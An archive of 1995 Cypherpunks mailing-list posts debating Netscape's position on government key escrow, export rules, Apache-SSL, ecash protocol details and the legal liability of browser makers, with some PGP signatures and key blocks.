---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From sameer at c2.org Sat Dec 2 22:58:45 1995 From: sameer at c2.org (sameer) Date: Sun, 3 Dec 1995 14:58:45 +0800 Subject: Getting a copy of the Jim Clark speech In-Reply-To: <199512030120.CAA06452@utopia.hacktic.nl> Message-ID: <199512030641.WAA19211@infinity.c2.org> > client profile, provided you are using Apache 0.8.x (I know sameer is). See Incorrect. We are running Apache 1.0.0 -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From blancw at accessone.com Sat Dec 2 23:07:54 1995 From: blancw at accessone.com (blancw at accessone.com) Date: Sun, 3 Dec 1995 15:07:54 +0800 Subject: Info on Netscape's key escrow position Message-ID: <9512030656.AA22522@pulm1.accessone.com> >From Hal Finney: [in regard to Jim Clark "preaching acquiescence"]: Where is the recognition that the right to tap communications is not granted by God but an accident of technology, one which can be taken away by technological progress as easily as it was granted? .............................................................. I agree with Hal's comments. If Netscape acquiesced to the use of GAK, it would be very easy for cypherpunks and others to switch browsers; they could re-direct interest to Mosaic or even create their own. Netscape is in a prominent position, however, in the net community, which is looking to prevent government control of their electronic communication. The NSA and other government agencies are looking for excuses to give their decisions the appearance of legitimacy. Any perceived weakness on the part of the commercial key players in cyberspace can be perceived as conducive towards the implementation of mandatory security plans, in disregard of the actual desires of internet users. It appears that Netscape is stuck between a rock and a hard place: . if they adamantly resist GAK, they're in trouble with "the Law" . if they appear agreeable to complying with future legal mandates, they're in trouble in with their customers in cyberspace. Losing the fight intellectually precedes losing it in fact. This is more likely to result when the distinction between government "authority" vs citizen "rights" is obscured from the general consciousness (as in: whose business is it, anyway?). Anyone who provides a communication service which can be made accessible to "the Law" becomes by default a representative of the issue, which to me amounts to what someone want to promote in the U.S. (or the world) in terms of ideals; in terms of a way of life. It would promote an atmosphere of intellectual integrity to have explicitly definite statements about the objections to GAK, but barring that it is useful to know that these representatives appreciate why the difference is important. . is it because money is being lost? . because privacy is at stake? . because the ideal of self-determination is being muddled, along with . an understanding of where the concept of "individual unit citizens" stands in relation to concepts of "government authority"? . because of the consequences of that obfuscation? The caution with which this GAK business is being dealt with I think is symptomatic of an underlying problem, which is of not having a sense of freedom to stand up to the Dark Side. .. Blanc From sameer at c2.org Sat Dec 2 23:47:22 1995 From: sameer at c2.org (sameer) Date: Sun, 3 Dec 1995 15:47:22 +0800 Subject: your mail In-Reply-To: <199512030545.AAA01728@bsu-cs.bsu.edu> Message-ID: <199512030732.XAA23416@infinity.c2.org> > Competing with Netscape is obviously something that's easier said than > done. But we ought to consider the strategic importance of having robust, I hate to repeat myself, but sometimes people don't listen. http://www.c2.org/apachessl/ -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From asgaard at sos.sll.se Sun Dec 3 15:55:48 1995 From: asgaard at sos.sll.se (Mats Bergstrom) Date: Sun, 3 Dec 95 15:55:48 PST Subject: Do the Right Thing In-Reply-To: <61765.pfarrell@netcom.com> Message-ID: On Sun, 3 Dec 1995, Pat Farrell wrote: > If the issue is just that people don't like the idea that the free, > downloadable is GAK'd and that they have to pay $50 for a browser > with strong crypto, please take your whining off list. Thanks for the concern you are showing for the rest of the world. What if the $50 outside the US will buy us a GAK'd client? We would be much safer with 40 bits un-GAK'd than 64 bits GAK'd. Mats From djw at pdcorp.com Sun Dec 3 16:14:31 1995 From: djw at pdcorp.com (Dan Weinstein) Date: Sun, 3 Dec 95 16:14:31 PST Subject: GAK Flap Happening at a Good Time--Journalists Read! In-Reply-To: Message-ID: <30c23e97.16338172@email.pdcorp.com> On Sun, 3 Dec 1995 06:20:52 -0500 (EST), you wrote: >On Sun, 3 Dec 1995, Dan Weinstein wrote: > >> On Sat, 2 Dec 1995 20:16:08 -0500 (EST), Black Unicorn >> wrote: >> >> >On Sat, 2 Dec 1995, Jeff Weinstein wrote: >> > >> >> Black Unicorn wrote: > >> >> > To the outsider, it looks as if Netscape 'owes' the government. >> >> >> >> We do owe the government. They have paid us for Servers and Clients >> >> that support Fortezza. That is what we owe them. The money that the >> >> NSA gave us for Fortezza is not very significant compared to what we >> >> are getting from commercial sources. >> > >> >Obviously it was significant enough to take. It was also a perfect >> >opportunity for Netscape to express concerns about the future of the >> >technology, which is in netscape's interest. The astute deal maker would >> >be happy to work with the NSA on his own terms. Instead, it >> >would appear that Netscape is working FOR NSA on their terms. >> >> If you read what they had to say about this, you know that they are >> hoping others will create non-escrowed crypto hardware using the same >> interface. I see no reason for them to not include support for any >> available hardware system (even if it includes GAK), as long as they >> continue to support non-escrowed encryption internally. This allows >> the customer to decide that they have no problem with GAK and use the >> external system, or use the internal system and not have GAK. > >I read it quite carefully. I just was not as easily taken in by the >double speak as you were. I see, you cannot say that they are really supporting GAK based upon the actual statements made, so you simply assert it. >Hoping others will do something is about as useful as sitting on your thumb. Yes, but making something an economically viable venture is very useful. That is what they have done. They have implemented an interface into a widely available piece of software. This makes it much more economically viable for others to implement strong crypto into another product using the same interface. >Netscape is in a position to make some policy impact here. If they >insist on going another way, I want to hear why, not that they are all on >our side and we should be nice because really we're all in this together, >and afterall, Netscape isn't such a bad lot. Jeff Weinstein has said that Netscape is drafting an official position paper and that it would be available in the near future. If Netscape lives up to this, we will soon enough have the companies position and not just that of two employees (Jeff Weinstein and Jim Clark). Why do you feel you must jump to judge the company based on the opinions of two of its employees? This is especially questionable when one is clearly stating that the company is against GAK and the other is at worst being unclear. If you feel they are being contradictory, wait a week and look at their policy statement then decide. >They can support whoever they like. I just want to hear WHY. More >importantly, I don't want to be snowed with some horse hockey answer. It >insults my intelligence. Yours was obviously unaffected. Wait a week and read their official statement then decide. You accuse me of logical fallacies, but then argue through insult and assertion. You have not pointed to a single fact or any contradictory statements in posts to this list. I will admit that Jim Clark was somewhat unclear, but I attribute this to the fact that the official company position is as yet not written and thus he is attempting to remain somewhat neutral. >> >I'd be interested to know what a 'government liason person' is. It >> >sounds to me like an 'in house lobbist.' There is an old joke in the >> >beltway about in house lobbists. >> > >> >I also would like to know why you are actively lobbying for >> >'claification' rather than 'modification' of the current policy. >> >> Until the current policy is clearly defined it is like a moving >> target. Once the government has been pinned down to a single policy, >> it will be much easier to dispute their policies. Currently the >> government can say anything they want about their enforcement of ITAR, >> because they have not stated a clear set of rules with regard to it. >> Once they have set clear rules, those rules can be shown to be overly >> restrictive or even unenforceable. > >I believe you actually think you are teaching me something here. You asked why they wanted clarification and I simply responded. >I said before, and I will say again. If Netscape is against GAK, then >let them be AGAINST GAK. If they are just going to try and finesse their >way into the market without making to many waves, let's hear it that way >instead of some crap about how they are 'lobbying actively against GAK' >(Which I might point out, is an assertion that fell apart at the most >basic prodding). Wait a week. As far as their lobbying assertion falling apart, I must have missed this. My understanding is that: A) They support several industry groups that are taking an active position in opposition to GAK. B) They have until very recently had only very limited resources. C) Have just recently hired an in house lobbyist. D) That they did not attend the Bernstein hearing. Now given point B, I see no reason to expect that they would in the past have done much more than they have. Given point C, I see they are currently expanding their lobbying. If point D is the measure of crypto correctness, then I to am guilty. Though I do not live in the vicinity, I guess I should have been expected to fly up to lend my moral support. Bovine excrement. >> Also, lawyers usually advise clients based on a worst case scenario, >> thus when the government is unclear on its rules, the lawyers advise >> their clients based upon the worst possible interpretation of the law. >> This is done to protect their client. By not stating a policy, the >> government is making that worst case happen, without having to be the >> bad guy by actually attempting to enforce such a policy. > >I really think you are pompus enough to think you are teaching people >things they don't know here. Again, you asked, I answered. I did not expect that this would be new to anyone on the list, but you asked. >I invite you to re-read the entire conversation and discover, as an >exercise, that the issue is not what the government is or is not doing, >but what netscape is or is not doing. I could care about Netscape's >loose-lipped lawyers. You seem very concerned about what Netscape is doing, and as such should be concerned about what their lawyers are _forced_ to tell them. I understand that the discussion is about Netscape not the government, but discussing actions without discussing motives is useless. >> > >> >Netscape seems to be taking the position, "We'd love it if you'd let us >> >do X, but we are happy to roll over for whatever." and "By the way, >> >what is the rule on exporting software again?" >> > >> >I am impressed that some effort is being made. I think it in the form of >> >'too little, too late.' But hey, who am I? >> >> I think you are being too critical, they have done more than any >> company I know of to make easy to use crypto widely available. > >0 + .00001 = .00001 > >Yes, just as last time you checked, .00001 is still more than 0. My point is that you are too quick to call your recent ally an enemy. You may not see what Netscape has done as important, but I believe that many do (including me). They are supposed to have integrated e-mail crypto in the final release of Navigator 2.0. I will remind you that Jeff Weinstein has said that this will not include GAK. >> They >> may be willing to obey the laws if they require GAK, but I do not feel >> that they are just rolling over either. I strongly oppose GAK, but I >> do not believe that no crypto is better than GAK crypto. I would >> rather keep some people out than nobody out. > >Your ignorance is assuming that the options you present are the only >options available. JW made the same mistake. In logical discourse this >is called "narrowing the field." It's a version of the 'straw man' >and a classic flaw in logical argument. I am not saying that the choice is between either no crypto or GAK crypto. I am saying that they have only said that they will go to GAK if the choice is between GAK crypto and no crypto. To the best of my knowledge they have not said that they would implement a GAK only product in any other situation. I think that this is reasonable, I do not think that we should let it come to this. We need to insure that they (or anyone else) are never put into that position. (and yes they should to.) >> Dan Weinstein >> djw at pdcorp.com >> http://www.earthlink.net/~danjw >> PGP public key is available from my Home Page. >> All opinions expressed above are mine. >> >> "I understand by 'freedom of Spirit' something quite definite - >> the unconditional will to say No, where it is dangerous to say >> No. > >This has got to be the most ironic of signatures I have ever seen. > >Why don't you begin to apply the cute quotes you put in your .sig to real >life and tell Netscape to grow a backbone and say 'No.' to GAK? I sent a message to Netscape after reading the article that started this, It simply stated that I wanted clarification on their position on GAK and that if they were to support it they would lose a loyal customer. I have since been convinced by Jeff Weinstein's posts to this list that the company does not support GAK, and in fact they oppose it. You would do better to spend less time insulting people and more time trying to support your arguments. Dan Weinstein djw at pdcorp.com http://www.earthlink.net/~danjw PGP public key is available from my Home Page. All opinions expressed above are mine. "I understand by 'freedom of Spirit' something quite definite - the unconditional will to say No, where it is dangerous to say No. Friedrich Nietzsche From nobody at REPLAY.COM Sun Dec 3 16:14:43 1995 From: nobody at REPLAY.COM (Anonymous) Date: Sun, 3 Dec 95 16:14:43 PST Subject: apachessl info Message-ID: <199512040015.BAA22063@utopia.hacktic.nl> -----BEGIN PGP SIGNED MESSAGE----- "James A. Donald" wrote: >>At 11:32 PM 12/2/95 -0800, sameer wrote: >> I hate to repeat myself, but sometimes people don't listen. >>http://www.c2.org/apachessl/ >This Web page fails to explain what Apache-SSL actually is, what it is good >for, >and why people should use it. What I missed was the how-to on getting a certified key. Wasn't there a way of doing that through e-world (Apple's on-line service) for free? Wilhelm Busch -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMMI8XYiUi5SQtQ3tAQFplQf/Ua4/xmkbLRkDCqK1ws6HkhG4IyzFIz0r ESxaEXme6Ev9jTIzQtR+Stabi31H1hbMwkOR/MKSxx9vhuCpzX4PrKtjaMpugXMy nJ6voHmveZd4gErQJ6TM9X42TroaypDa/lL6Bc9UGAGoMAl37tst/jzL3l11iRfO OLKrsL9rDRtwu50sdulqEhrbphuTZriPuReDR5ZluAwZzsDcu8Upor1DIP9W+bVu zYTziaFmHAigP/dJOyi6x/Zd6aDoIl2U55YfQ+Pa3RUyarDVIjcnR/D6N8NeB7Cr XSZo78T9mG4JygZItY86z9Ct5vL1o1MzSNcm3KmuUwuyYOJcGUlddg== =Jry0 -----END PGP SIGNATURE----- -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQEPAzC9XzIAAAEIAMJ9b1kiyvrhoa5OGf7G1hSt6yWmzX7napWo5qRAh+xUE+Ue ftxUmGE1p/lFoUJIRKhH2I0yktcp3Wirmm61rIfJ5S0s9BnE3W+Uk8B1jxim2JvZ ezOPn0so+dUJP4tvtzDQZDCk5VGTsJkMAvhxahripQKpkWC5qL9nM9cvKa2ZnFjT 8NRaaAx1eMST/k4ntc431jFXNgnBDrxNBb8RNMb7b7jtFGOFN8Y3Mj5TmprXps2V ydtL57Z85MKfFjkAMeMtugqieJBWEsqA3C1/wKhB9cKb1Rdu/97VpZ0v+FQe9Y1k qwsQ78chNzBpfHjxSSuo8T4NV0AZiJSLlJC1De0AEQEAAbQNV2lsaGVsbSBCdXNj aA== =/fpw -----END PGP PUBLIC KEY BLOCK----- From fc at all.net Sun Dec 3 16:20:16 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Sun, 3 Dec 95 16:20:16 PST Subject: Globally legal Netscape In-Reply-To: <9512031626.ZM17818@pamd.cig.mot.com> Message-ID: <9512040017.AA26026@all.net> > look, this is just a *bit* extreme. having been one of those folks sworn > to uphold the Constitution, i can tell all of you that there is no master > plan to rid the American people of their rights and freedom. The problem is that there is no master plan to uphold it. Freedoms are rarely lost all at once. Rather they are nibbled away in the name of crime control, keeping people from hurting themselves, religious beliefs, and the like. > this is not to say we should not keep a sharp and keen eye open for any > assault upon our liberties. rather, having "BEEN THERE", i just do not > see any threat along the lines of, er, Hitler, Stalin, Mussolini, et. al. Nobody in power saw the threat of Hitler even after he invaded Poland. In the early days, the Jews thought that being identified as Jews was no big deal. The Chinese cameras were portrayed as a way to reduce crime. The files kept by Iraq on the Kurds were supposedly used to track criminals. Law enforcement is almost universally used as an excuse to collect information on individuals in the name of helping society, but this power is easily abused. - It was abused in the US in the 60s against blacks seeking equal rights - in the name of civil order. - It was abused in the 50s against Americans who were even peripherally associated with the Communist party - in the name of civil order. - It is being used today in the name of stopping white supremicists and drug dealers - in the name of civil order. Just like in the 50s and the 60s, the FBI is the one pushing for more wiretaps and less privacy, and just like the 50s and 60s, people are buying the anti-crime claim when in fact, this is about political power over the rights of individual citizens. Now I don't necessarily support more than one of these three causes, but I do know that when one person loses their right of privacy, we all lose our rights as well. > let's try to keep this in perspective, Fred. perhaps a little less > caffiene would help? ;-) I haven't had any Caffine lately, but I did go for a nice hike this morning. It's a natural high. -> See: Info-Sec Heaven at URL http://all.net/ Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From ahupp at primenet.com Sun Dec 3 16:26:12 1995 From: ahupp at primenet.com (Adam Hupp) Date: Sun, 3 Dec 95 16:26:12 PST Subject: Pegasus Mail PGP Extensions? Message-ID: <199512040026.RAA02724@usr2.primenet.com> Does anyone know if there are any PGP extensions for WinPMail, and where to get them? -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQBtAzCNppQAAAEDALhWZl7IuGZ9zZT5bACo0b/1L0Nv0C72vKHIO3IHh+cwpHHa 2Ozb9aeO0UvXGwkkZIYgUm0EvmzKh7yb1GTLvBp5kXpR3I9w+Yj4LGlBDERpUWw6 x4ED49pwDnz1Hl5FBQAFEbQYYXNoIDxhaHVwcEBwcmltZW5ldC5jb20+ =PtJK -----END PGP PUBLIC KEY BLOCK----- From bdavis at thepoint.net Sun Dec 3 16:29:06 1995 From: bdavis at thepoint.net (Brian Davis) Date: Sun, 3 Dec 95 16:29:06 PST Subject: Netscape gives in to key escrow In-Reply-To: Message-ID: On Fri, 1 Dec 1995, Jonathan Zamick wrote: > > >And thus we return to my original point, which is that it will depend on > >what is said/disclosed. If every copy of GAKscape had a banner, bigger > >than the Netscape "N" which said, "The government can read every message > >you send using this software no matter what you do" then I think > >consumers will be hard pressed to say they weren't warned. > > I don't mean to be inflamatory, but it isn't much of a point. They aren't > going to put such a banner up because that would limit their business. The Once again, I must disagree. Several bulletin boards I frequent include an opening banner announcing that, essentially, all messages left there are "public" and can be read by anyone. I can get the exact language if you like. The message specifically refers to the wiretapping statute, 18 U.S.C. Section 2510 et seq. This keeps the sysop, arguably, from suffering civil liability if mail is intercepted. Nobody reads the banner, but I believe that it has more effect than a fig leaf. > goal of Netscape (though I don't single them out), any corporation that would > profit from business of those who seek encryption while still allowing GAK, > and the government, is to limit the public's awareness of the size of the > hole. If they let people know the extent of the hole, then they'll use > products w/out it which blows profits from companies involved, and doesn't > benefit the government who want it in common use. > > >I disagree. Almost nobody read the fine print on the back of a note you > >sign when you buy a car or otherwise take out a loan, but the provisions > >are generally enforceable ... Ignorance is not necessarily an excuse. > > The question is whether there was false representation of the security of > the product. > 1. The general knowledge of encryption and secure electronic financial > transactions is significantly lower than that of more standard > transactions. > But how many of those who are less knowledgable about such things expect the level of privacy you automatically infer? Is that expectation reasonable? Does the party have any duty to inquire??? > 2. Applying for a loan or buying a car involve actively going out, negotiating, > signing contracts, etc. It will be much simpler to simply stick your vital > info into a 'secure' browser. > Getting a browser involves going to the store and installing the software or surfing to a site and downloading the software. Then it must be installed. > 3. The choice of browser to use will be done, based on representations by > companies about the security of their product. If Netscape doesn't ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ I doubt it in the case of the less sophisticated (and the more sophisticated are on their own). I suspect that Mr. Newbie is more likely to pick a browser on the basis of what his friend tells him, or what PC Computing tells him, or the fact that he read about Netscape in the business section of the paper. > explicitly > state in direct terms when accessing the browser that the GAK is a > potential security risk, then they will be sued. Simply because someone > will get blamed. Getting sued and being liable are very different, just as getting charged with a crime and having done something morally wrong can be very different. I am much less confident than you apparently are that the court system (and products liability law) are likely to impose duties on the makers of browsers such as you suggest. In an advancing technological area, I don't believe that liability will be imposed so quickly, especially if some disclosure is made. What disclosure is required is likely to be fact specific on a case by case basis until the law has time to develop some sort of standards. Can I expect to recover from Ford for my injuries in a car wreck because I would not have been hurt in a Volvo, when Ford meets all federal standards? Generally not. > Since they (or again any company that incorporates GAK.. I really don't > want to target Netscape in specific) will make the threat sound as > insignificant as possible, and not bring it to people's attention (and they > can't afford to do so) when (not if) it is breached they will be taken to > court repeatedly. Don't forget, taking them to court takes $$$. And they only have $5 Billion to pay for lawyers ... > > > > >EBD > > Jonathan > > ------------------------------------------------------------------------ > ..Jonathan Zamick Consensus Development Corporation.. From tcmay at got.net Sun Dec 3 00:53:02 1995 From: tcmay at got.net (Timothy C. May) Date: Sun, 3 Dec 1995 16:53:02 +0800 Subject: Info on Netscape's key escrow position Message-ID: I say "Hear, Hear!" to Hal Finney's message about why we should be mad at Netscape and Jim Clark. (Although I still have a bit of hope that Netscape and Clark will see the importance of not simply giving up.) --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From jsw at netscape.com Sun Dec 3 01:02:53 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Sun, 3 Dec 1995 17:02:53 +0800 Subject: Why Netscape employees should not leave... In-Reply-To: Message-ID: <30C162DD.1E2F@netscape.com> Black Unicorn wrote: > I just get sick of those who tout themselves as Experts in Software > Munitions and are in fact are merely in it for the cash. In it for the > cash is just fine. Just don't tell me later you aren't. Can't I be a supporter of strong crypto, and also be in it for the money? Many people here make good money off of crypto related work. If I'm asked to implement GAK in a situation where it is not mandated by law, I won't do it. > > I read the Jim Clark statement that Jeff forwarded. It seemed noncomittal > > on the actual issue of whether Netscape will build a U.S.-supported GAK (as > > opposed to offering GAK for the Iraqis or French). I await with interest > > the clarification of the anti-GAK stance that Jeff alluded to. > > I believe you got it with: > > "If the law requires GAK, then I believe that we will implement it rather > than just disable encryption." Tim was referring to the position statement against GAK that we will be releasing before the NIST meeting next week. > Note that the phrase is entirely ambigious on whether this refers to the > law requiring GAK for export, or export AND domestic sales. Netscape > will install GAK into whatever will increase its sales. I understand > and respect this position in the context of a company which needs > badly to start raking in some profits. What I meant, and have said in other places, is that if it is legal to ship a product without GAK for use inside the US, or anywhere else, I believe we will do it, because that is what our customers want. > The title "Software Munitions Expert" or similar such should probably be > changed to "GAK marketing expert" however. I'm sorry my dig at the ITAR does not ammuse you. Your suggested replacement would not be appropriate since I don't support GAK (I believe that it is one of the most evil things any government could do to its citizens), and I'm not in marketing. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From shamrock at netcom.com Sun Dec 3 01:06:31 1995 From: shamrock at netcom.com (Lucky Green) Date: Sun, 3 Dec 1995 17:06:31 +0800 Subject: Questions/Comments on ecash protocol (fwd) Message-ID: Hal wrote: [parts elided] >BTW since apparently both deposit and payment messages are not encrypted, >coins made out to "@" are in danger of being stolen both while en route >from customer to shop and from shop to bank. This is significant from >the point of view of payee anonymous systems, which will need to use such >coins. More encryption will be necessary when such coins are passed >around. Absolutely. Wildcard coins are stealable in transit. However, one might safely assume that transactions conducted using such coins be encrypted by other methods. >Well, I would think identification of the payer's bank will be >necessary for any coin based system so you know where to cash in the >coins, so I don't think this is going to go away. Of course as of now >everyone has the same bank so it is not an issue. Your analysis is correct. The good news, for the free marketers on this list :-), is that there will be other banks issuing Ecash in the near future. However, they are unlikely to offer the flexibility you have with Mark Twain Bank. >There is no such thing! This is one of the most common misconceptions. >This version of ecash does not trace double spenders. It prevents double >spending by checking each coin to make sure it has not already been >spent. Tracing of double spending is only necessary in offline systems >where coins are not checked right away, but that is not present here. True. >Very good comments. I'm sure the next version will be much better if >they are careful to clear up the kinds of issues you have raised. Will do. -- Lucky Green PGP encrypted mail preferred. From stewarts at ix.netcom.com Sun Dec 3 01:06:51 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sun, 3 Dec 1995 17:06:51 +0800 Subject: prototype slot-machine Message-ID: <199512030850.AAA03618@ix3.ix.netcom.com> At 10:23 PM 12/2/95 -0800, sameer wrote: > I've written up a slot-machine thing for ecash, very >experimental, very buggy, not very slick, (i'd like to get the >technical bugs worked out before i put a fancy wrapper on it) and i'd >*like* to announce it here for testing, but I'm worrying about >gambling laws.. > any thoughts? Use the demo digicash; it's not real money, and it's never been illegal to play for poker chips. The mere fact that there's an exchange market for real money vs. digicash play money doesn't change that. It'd be nice if you take small bets, since many of us only have $100 or so of play money; quarters should be fine. To do the job right, you need audio.... #-- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 # Anybody notice that Microsoft's Wide Open Road ad has barbed-wire fences # on both sides of the road? From jsw at netscape.com Sun Dec 3 01:10:11 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Sun, 3 Dec 1995 17:10:11 +0800 Subject: Info on Netscape's key escrow position In-Reply-To: <01HYCC2KMZJ48WZ6BG@mbcl.rutgers.edu> Message-ID: <30C16484.443@netscape.com> Alex Strasheim wrote: > Why not say: > > 1 Netscape will follow all laws and regulations. > 2 The current rules are forcing Netscape to choose > between providing reasonable levels of privacy > to its customers and competing in the international > marketplace. > 3 Netscape feels the rules should be changed to make > this choice unnecessary. I think this is what we are trying to do. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From djw at pdcorp.com Sun Dec 3 17:10:33 1995 From: djw at pdcorp.com (Dan Weinstein) Date: Sun, 3 Dec 95 17:10:33 PST Subject: Jim Clark, "Mr. Bubble" In-Reply-To: <199512032055.VAA13990@utopia.hacktic.nl> Message-ID: <30c24a22.19293808@email.pdcorp.com> On Sun, 3 Dec 1995 21:55:09 +0100, you wrote: >Alex Strasheim: > >> > 1 Make illegal software available by FTP >> > 2 Explain it's doing so because ITAR is bullshit >> > 3 Face the gov't down in the press and in the courts >> >> Go for it. We're behind you 100%. > > If I were worth billions, if I were the sparkle on the high-tech >bubble, if I had a Major hand in engineering crucial protocols, if my >company were so young that it hadn't yet had time to bog down in business >as usual, I think I probably would. That's a lot of Big talk and a lot of >Ifs, ain't it? But that's how it goes: I doubt he -- or anyone else -- >would give as much to my LDF as I gave to his (chump change, but more than >I could afford). > Clark should ask himself what Rabbi Akiva put best: > > If not me, who? > If not now, when? > > I do my small part, in my small way; he can do his big part, in his >big way. One thing scares the spooks more than what they oppose: >publicity. You have just proven your self to be a hypocrite. If you expect of others more than you expect of your self, you need to reevaluate your own life. If you are not willing to risk your life, fortune, and reputation on your beliefs, how can you expect Mr. Clark or anyone else to do the same. Dan Weinstein djw at pdcorp.com http://www.earthlink.net/~danjw PGP public key is available from my Home Page. All opinions expressed above are mine. "I understand by 'freedom of Spirit' something quite definite - the unconditional will to say No, where it is dangerous to say No. Friedrich Nietzsche From jsw at netscape.com Sun Dec 3 01:14:30 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Sun, 3 Dec 1995 17:14:30 +0800 Subject: Info on Netscape's key escrow position In-Reply-To: <2.2b7.32.19951203004908.0087902c@mail.teleport.com> Message-ID: <30C1660F.47EA@netscape.com> Alan Olsen wrote: > > At 11:01 PM 12/1/95 -0800, you wrote: > > > > I had lunch with Jim Clark today, and explained the furor that was > >currently going on in cypherpunks and elsewhere. After lunch he sent > >me the e-mail that I've attached below to pass along. I think the gist > >of it is that if governments require key escrow, we will have to do it > >in order to sell our products with encryption into those countries. > [rest removed for brevity] > > Well someone has to say it... > > "I am glad to see that Jim Clark is no longer hocking up GAK." > > I just hope Netscape does not get seduced by the dark side of the feds and > impliment GAK "because they have to". It is one thing to have cryptography > that is brute forcable in a few weeks, it is another to have a secret key > that some nosey government agent use to decrypt it in seconds. If Netscape > impliments GAK I will move to something else because I will not be able to > trust that some other nasty surprise will exist in the software. (As well > as having no real security left in the product.) I don't think you will ever be in this position. If we are forced implement GAK by the government, everyone else will too. > Do I beleive that Netscape will impliment GAK in the near future? Not > really. Not unless they go through another purge like the one back in > February(?), but I do not see that as being very likely. (With the current > IPO, news of a employee purge would probibly drive down the stock and that > would be the last thing the top brass would want.) There was never a "purge" in Netscape engineering. What you are referring to happened right before I got here. As I understand it, it was localized to the customer support organization(which is why you know about it I assume), and mostly involved contractors. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From bdavis at thepoint.net Sun Dec 3 17:18:46 1995 From: bdavis at thepoint.net (Brian Davis) Date: Sun, 3 Dec 95 17:18:46 PST Subject: Netscape gives in to key escrow In-Reply-To: Message-ID: On Sat, 2 Dec 1995, Black Unicorn wrote: > On Fri, 1 Dec 1995, Brian Davis wrote: > > > On Fri, 1 Dec 1995, Jonathan Zamick wrote: > > > I disagree. Almost nobody read the fine print on the back of a note you > > sign when you buy a car or otherwise take out a loan, but the provisions > > are generally enforceable ... Ignorance is not necessarily an excuse. > > Actually, I was under the impression that adherance contracts like that You are correct in saying that onerous provisions of adhesion contracts are sometimes not enforced against the party who did not draft the contract (the one who had it "forced" upon them). Again, very fact specific. And that has been my point all along. As an aside, understand that my comments on this thread relate to my semi-educated prediction of how the law will be applied in this context. It does not reflect what the law would be if I were King of the forest. > (the most oft touted example is the ski lift ticket with four paragraphs > on the back) are often tossed out when it has to do with liability on > that order. The reason loan agreements are not often thrown out is > because courts find an increased expectation that the consumer would be > paying attention to the back of loan documents than the back of a ski > lift ticket. I think it will be unlikely that warnings on the box of a > given piece of software will suffice. Large banners in the program > itself may meet the threshold. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Precisely. > If there is enough interest, I will research the threshold issue. > EBD From jsw at netscape.com Sun Dec 3 01:20:46 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Sun, 3 Dec 1995 17:20:46 +0800 Subject: Talking to Jim In-Reply-To: <199512012310.KAA23844@iccu6.ipswich.gil.com.au> Message-ID: <30C16890.41C6@netscape.com> Perry E. Metzger wrote: > > PeterWiltshire writes: > > I emailed Jim Clark day before yesterday about his comments re key escrow. > > He responded. As it's not good form to post private email, might I suggest > > that one of the 'elders' here put to Jim a list of questions on the proviso > > that his answers can be posted to the list. You never know, a lot of > > speculation might be confirmed or denied. > > Why doesn't he just post on his own? Its not like this mailing list is > unknown -- we got him bad press on the cover of the Times in the > past. Anyone is free to send email here. Jim offered to send to the list directly, but given the recent gripes about non-subscribers spamming the list, I thought it might be in bad form, and offered to forward it to the list for him. He doesn't really have time to read cypherpunks himself. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From bdavis at thepoint.net Sun Dec 3 17:21:40 1995 From: bdavis at thepoint.net (Brian Davis) Date: Sun, 3 Dec 95 17:21:40 PST Subject: GAK Flap Happening at a Good Time--Journalists Read! In-Reply-To: Message-ID: On Sat, 2 Dec 1995, Black Unicorn wrote: > On Fri, 1 Dec 1995, Jeff Weinstein wrote: > > > See my recent message to this list. We will be taking an anti-GAK > > position. > > So you will refuse to implement GAK in future version of netscape then? > Or you will merely do lipservice to the GAK policies at the conference? > Can you say "shareholders derivative suit"??? > I think the distinction is quite key. Good one! > Forgive the pun. > > > --Jeff > -- EBD From sameer at c2.org Sun Dec 3 17:34:08 1995 From: sameer at c2.org (sameer) Date: Sun, 3 Dec 95 17:34:08 PST Subject: apachessl info In-Reply-To: <199512040015.BAA22063@utopia.hacktic.nl> Message-ID: <199512040129.RAA19146@infinity.c2.org> > > What I missed was the how-to on getting a certified key. Wasn't there a way > of doing that through e-world (Apple's on-line service) for free? "Low-assurance" client keys are free. Server keys are not free. http://www.verisign.com/ -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 